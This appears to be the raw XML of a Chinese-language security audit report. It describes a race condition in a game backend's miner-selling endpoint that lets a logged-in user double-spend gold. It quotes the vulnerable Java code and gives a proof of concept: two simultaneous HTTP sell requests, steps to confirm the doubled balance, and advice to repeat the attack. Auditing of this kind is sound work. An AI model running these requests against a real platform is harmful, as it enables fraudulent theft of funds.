              <w:t xml:space="preserve">  ↓ resolveMinerToSell(userId, 1, 1)     ← 竞态窗口入口</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  ↓ MinerService.sell() 续 → findByUserIdForUpdate(userId) → 加金币 → delete(miner)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="398"/>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：金币（goldBalance）是游戏核心资产，可兑换 USDT 奖励或其他价值物。利用该漏洞可在单次"一矿机"的前提下无限叠加金币，直接影响平台资金安全。</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SellForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Integer inStorage  — @Range(min=0, max=1)</w:t>
              <w:br/>
              <w:t>//   Integer slotId     — @Range(min=1, max=9)</w:t>
              <w:br/>
              <w:t>@PostMapping("/sell")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; sell(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">                              @RequestBody @Valid SellForm form) {  // ← HTTP 可控入口</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.sell(userId, form.getInStorage(), form.getSlotId());  // ← 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 资金写入入口：MinerService.java # sell()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void sell(Long userId, Integer inStorage, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = resolveMinerToSell(userId, inStorage, slotId);  // ← 竞态窗口：两事务返回同一 miner</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal sellPrice = getSellPrice(miner.getMinerLevel() != null ? miner.getMinerLevel() : 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserIdForUpdate(userId)  // ← 账户有锁，但 miner 无有效锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户账户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(account.getGoldBalance().add(sellPrice));  // ← 两个事务各自加一次金币</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.delete(miner);  // ← T1 删除成功；T2 对已删行静默 no-op，不抛异常</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：MinerService.java # resolveMinerToSell()（inStorage=1 分支）</w:t>
              <w:br/>
              <w:t>private UserMiner resolveMinerToSell(Long userId, Integer inStorage, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    } else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // 存放处查询无 FOR UPDATE，并发售卖同一序号矿机可双花金币  // ← 开发者自注释：已知竞态双花漏洞</w:t>
              <w:br/>
              <w:t xml:space="preserve">        List&lt;UserMiner&gt; storage = userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 1);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>若上方查询未产生真实 SELECT…FOR UPDATE，两并发事务此处读到相同列表</w:t>
              <w:br/>
              <w:t xml:space="preserve">        storage.sort(Comparator.comparing(UserMiner::getId));</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int idx = slotId - 1;   // slotId=1 → idx=0 → 两事务均取 miner_id 最小那台</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (idx &gt;= storage.size()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            throw new IllegalArgumentException("存放处无该序号矿机");</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return storage.get(idx);  // ← 漏洞点：两事务返回同一 UserMiner 对象</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以下为并发双请求示例（利用 curl 并行，或 Burp Suite Repeater 的 race condition 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请求 A（T1）</w:t>
              <w:br/>
              <w:t>POST /api/miner/sell HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法 token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Timestamp: &lt;ts&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Nonce: &lt;nonce_A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_A&gt;</w:t>
              <w:br/>
              <w:br/>
              <w:t>{"inStorage":1,"slotId":1}</w:t>
              <w:br/>
              <w:br/>
              <w:t>---</w:t>
              <w:br/>
              <w:br/>
              <w:t># 请求 B（T2，与 A 同时发出）</w:t>
              <w:br/>
              <w:t>POST /api/miner/sell HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者合法 token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-Sign-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Timestamp: &lt;ts&gt;</w:t>
              <w:br/>
              <w:t>X-Sign-Nonce: &lt;nonce_B&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign_B&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inStorage":1,"slotId":1}</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399"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：确保攻击者账户存放处（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）中存有至少 1 枚矿机（矿机等级越高，单次 sellPrice 越大，收益越高）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>构造并发请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：使用 Burp Suite Intruder（Race Condition 模式）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>parallel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl、或任何 HTTP 并发工具，同时发出 ≥2 个相同请求（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1, slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），每个请求使用独立 nonce 通过签名校验。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>观察结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">预期正常行为：第一个请求成功，第二个请求返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>"存放处无该序号矿机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 异常。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞触发行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：两个请求均返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>200 {"code":200,"data":null}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（成功）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>验证金币翻倍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：查询账户金币余额，若余额增加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>2 × miner.sellPrice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，而存放处矿机数量只减少 1，则确认双花成立。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>循环增益</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：反复向存放处补充矿机并重复上述步骤，可将金币余额呈指数级积累。</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：账户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 增加量为单次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>sellPrice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的两倍，而实际只消耗一台矿机，形成金币无损增益。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406"/>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407"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通已登录用户，仅需持有有效 Bearer Token 及通过签名校验，无需任何特权角色</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 1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受影响调用链（2 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="408"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.sell → MinerService.java.sell → MinerService.java.getSellPrice → MinerService.java.getPriceFactor → MinerService.java.getPriceFactor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="409"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.sell → MinerService.java.sell → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel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audit_m148_477_sell_ctrl-path1of8.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m148_519_sell_ctrl-path4of8.md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：MinerService.java#sell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_20" w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞19：存放处矿机售卖 TOCTOU 竞态致金币双花</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="41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inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存放处矿机售卖路径并发竞态（TOCTOU）导致金币双花</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="41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src/main/java/com/gameBack/mjservice/service/MinerService.java:sell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="41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41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41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：普通用户（已登录）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="41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resolveMinerToSell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的存放处分支（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），代码注释中开发者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>自行明文标注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>了如下已知问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>// 存放处查询无 FOR UPDATE，并发售卖同一序号矿机可双花金币</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">该注释紧贴于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用之上，描述与方法名形成矛盾——方法名含 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 但注释显式断言"无 FOR UPDATE"。由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的仓库实现代码未包含在本次审计上下文中，无法确认其 SQL 是否真正携带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</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若该方法实际未持有行级排他锁（例如仓库实现中仅做普通查询、未附加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Lock(PESSIMISTIC_WRITE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 子句），则并发竞态如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">事务 T1 与 T2 同时进入存放处分支，均调用无锁的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorage(userId, 1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 读取同一份矿机列表（如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>[id=100, id=200]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），均取到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>idx=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 即 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>id=100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的同一矿机对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="417"/>
        </w:numPr>
